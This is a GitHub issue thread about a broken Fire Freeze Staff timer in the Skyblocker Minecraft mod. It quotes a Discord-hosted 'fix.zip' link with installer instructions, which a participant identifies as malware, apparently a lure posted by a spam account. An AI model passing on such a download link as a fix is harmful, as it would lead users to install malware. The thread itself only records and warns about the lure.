### ISSUE TITLE
Fire Freeze Staff Timer Broken

### ISSUE THREAD

**Issue by x-yingcan-x** [SkyblockerMod/Skyblocker#986]
### What happened?

Caused by refactor and forget to adjust this.

### Minecraft Version

1.21.0/1.21.1

### Skyblocker Version

skyblocker-1.22.1+1.21.1

**Comment by x-yingcan-x** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

I cant use discord because of my region :(
and how you instantly reply

**Comment by Julienraptor01** [comment]
> > try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer
> 
> I cant use discord because of my region :(
> and how you instantly reply
> 

Don't it's malware

**Comment by x-yingcan-x** [comment]
lol the trick will never work for me

**Comment by kevinthegreat1** [comment]
Not sure what's going on with this. Can you elaborate?

**Comment by x-yingcan-x** [comment]
just notice lol,
it doesnt do anything at all,not displaying anything, no crash, no lag, just literly nothing

**Comment by x-yingcan-x** [comment]
forget this already got fixed
